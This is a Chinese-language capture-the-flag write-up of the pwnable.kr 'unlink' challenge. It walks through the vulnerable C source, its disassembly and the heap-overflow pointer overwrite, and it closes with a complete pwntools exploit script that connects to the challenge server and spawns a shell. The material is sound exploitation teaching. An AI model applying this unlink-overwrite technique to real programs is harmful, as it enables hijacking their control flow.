pwnable.kr之unlink
之前在看别的东西,学习的随笔也没有写完......颓了几天。
由于最近在看堆,就把pwnable.kr上unlink这道题做一下,学习一下。
1.程序分析
#include <stdio.h> #include <stdlib.h> #include <string.h> typedef struct tagOBJ{ struct tagOBJ* fd; struct tagOBJ* bk; char buf[8]; }OBJ; void shell(){ system("/bin/sh"); } void unlink(OBJ* P){ OBJ* BK; OBJ* FD; BK=P->bk; FD=P->fd; FD->bk=BK; BK->fd=FD; } int main(int argc, char* argv[]){ malloc(1024); OBJ* A = (OBJ*)malloc(sizeof(OBJ)); OBJ* B = (OBJ*)malloc(sizeof(OBJ)); OBJ* C = (OBJ*)malloc(sizeof(OBJ)); // double linked list: A <-> B <-> C A->fd = B; B->bk = A; B->fd = C; C->bk = B; printf("here is stack address leak: %p ", &A); printf("here is heap address leak: %p ", A); printf("now that you have leaks, get shell! "); // heap overflow! gets(A->buf); // exploit this unlink! unlink(B); return 0; }
给出的源码如下。程序实现了一个结构体,指针域是两个指针,数据域是一个8字节大小的字符数组,其实就是模拟了一个chunk块,后面的unlink函数模拟了早期glibc中unlink函数解链表的形式。
程序的结尾有一个gets函数,向结构体A的buf中填充数据,可以看到这里对输入数据的大小没有做检查,所以存在堆溢出,我们应该可以覆盖B结构体的fd指针和bk指针。
这里泄露出了A在栈中的地址,以及A的堆地址。
gdb中调试一下,在输入‘abcd’之后,断点设在unlink函数中,A->buf地址保留在eax寄存器中,查看堆布局如下:
0x804b5b0是结构体A的首地址,可以看到,A的bk指针指向B,C的fd指针指向B。
unlink实现的功能其实入下:
P->fd->bk=P->bk
P->bk->fd=P->fd
覆盖B的bk和fd指针,可以进行两次任意写。IDA中伪代码如下:
0x8048539 <main+10>: push ebp 0x804853a <main+11>: mov ebp,esp 0x804853c <main+13>: push ecx => 0x804853d <main+14>: sub esp,0x14 0x8048540 <main+17>: sub esp,0xc 0x8048543 <main+20>: push 0x400 0x8048548 <main+25>: call 0x80483a0 <malloc@plt> 0x804854d <main+30>: add esp,0x10 0x8048550 <main+33>: sub esp,0xc 0x8048553 <main+36>: push 0x10 0x8048555 <main+38>: call 0x80483a0 <malloc@plt> 0x804855a <main+43>: add esp,0x10 0x804855d <main+46>: mov DWORD PTR [ebp-0x14],eax 0x8048560 <main+49>: sub esp,0xc 0x8048563 <main+52>: push 0x10 0x8048565 <main+54>: call 0x80483a0 <malloc@plt> 0x804856a <main+59>: add esp,0x10 0x804856d <main+62>: mov DWORD PTR [ebp-0xc],eax 0x8048570 <main+65>: sub esp,0xc 0x8048573 <main+68>: push 0x10 0x8048575 <main+70>: call 0x80483a0 <malloc@plt> 0x804857a <main+75>: add esp,0x10 0x804857d <main+78>: mov DWORD PTR [ebp-0x10],eax 0x8048580 <main+81>: mov eax,DWORD PTR [ebp-0x14] 0x8048583 <main+84>: mov edx,DWORD PTR [ebp-0xc] 0x8048586 <main+87>: mov DWORD PTR [eax],edx 0x8048588 <main+89>: mov edx,DWORD PTR [ebp-0x14] 0x804858b <main+92>: mov eax,DWORD PTR [ebp-0xc] 0x804858e <main+95>: mov DWORD PTR [eax+0x4],edx 0x8048591 <main+98>: mov eax,DWORD PTR [ebp-0xc] 0x8048594 <main+101>: mov edx,DWORD PTR [ebp-0x10] 0x8048597 <main+104>: mov DWORD PTR [eax],edx 0x8048599 <main+106>: mov eax,DWORD PTR [ebp-0x10] 0x804859c <main+109>: mov edx,DWORD PTR [ebp-0xc] 0x804859f <main+112>: mov DWORD PTR [eax+0x4],edx 0x80485a2 <main+115>: sub esp,0x8 0x80485a5 <main+118>: lea eax,[ebp-0x14] 0x80485a8 <main+121>: push eax 0x80485a9 <main+122>: push 0x8048698 0x80485ae <main+127>: call 0x8048380 <printf@plt> 0x80485b3 <main+132>: add esp,0x10 0x80485b6 <main+135>: mov eax,DWORD PTR [ebp-0x14] 0x80485b9 <main+138>: sub esp,0x8 0x80485bc <main+141>: push eax 0x80485bd <main+142>: push 0x80486b8 0x80485c2 <main+147>: call 0x8048380 <printf@plt> 0x80485c7 <main+152>: add esp,0x10 0x80485ca <main+155>: sub esp,0xc 0x80485cd <main+158>: push 0x80486d8 0x80485d2 <main+163>: call 0x80483b0 <puts@plt> 0x80485d7 <main+168>: add esp,0x10 0x80485da <main+171>: mov eax,DWORD PTR [ebp-0x14] 0x80485dd <main+174>: add eax,0x8 0x80485e0 <main+177>: sub esp,0xc 0x80485e3 <main+180>: push eax 0x80485e4 <main+181>: call 0x8048390 <gets@plt> 0x80485e9 <main+186>: add esp,0x10 0x80485ec <main+189>: sub esp,0xc 0x80485ef <main+192>: push DWORD PTR [ebp-0xc] 0x80485f2 <main+195>: call 0x8048504 <unlink> 0x80485f7 <main+200>: add esp,0x10 0x80485fa <main+203>: mov eax,0x0 0x80485ff <main+208>: mov ecx,DWORD PTR [ebp-0x4] 0x8048602 <main+211>: leave 0x8048603 <main+212>: lea esp,[ecx-0x4] 0x8048606 <main+215>: ret
主函数汇编代码如下。最后是把ecx-0x4=ebp-0x8地址处的值赋给了esp寄存器,ret把esp的值pop给eip寄存器。我们想要get shell,就要跳转到shell函数中,所以这里就要通过控制栈里的值来控制eip寄存器的值。
A,B,C结构体地址在栈中的布局如下所示:
我们要把shell函数的地址填充到ebp_0x8函数的地址处,也就是&A+0x12处。&A的地址,题目已经给我们了。
所以这里主要的问题就是如何填充堆空间了,再来理解一下unlink函数实现的功能:
假设我们把B的bk指针覆盖为“####”,fd指针覆盖为"$$$$",unlink函数就实现了一下功能:
BK=*(B+4)=####,把“####”赋给BK
FD=*(B)=$$$$,把“$$$$”赋给FD
FD->bk=BK=*($$$$+4)="####",就是把“####”写入地址“$$$$+4”处
BK->fd=*(####)="$$$$",就是把“$$$$”写入地址“####”处
0x80485ff <main+208>: mov ecx,DWORD PTR [ebp-0x4] 0x8048602 <main+211>: leave 0x8048603 <main+212>: lea esp,[ecx-0x4] 0x8048606 <main+215>: ret
我们把ecx-4指向的地址处的值,要覆盖为&shell_addr+4。
exp如下:
from pwn import * context.log_level="debug" DEBUG=0 if DEBUG: io=process('./unlink') else: sh=ssh(host='pwnable.kr',port=2222,user='unlink',password='guest') io=sh.run("./unlink") elf=ELF('./unlink') shell_addr=0x080484EC io.recvuntil("here is stack address leak: ") leak_stack=int(io.recv(10),16) print("stack_addr:{}".format(hex(leak_stack))) io.recvuntil("here is heap address leak: ") leak_heap=int(io.recv(10),16) print("heap_addr:{}".format(hex(leak_heap))) io.recvline() ebp_addr=leak_stack+0x14 ecx_addr=ebp_addr-0x4 padding='a'*8 payload=p32(shell_addr)+'a'*4+padding+p32(leak_heap+12)+p32(ebp_addr-4) io.send(payload) io.interactive()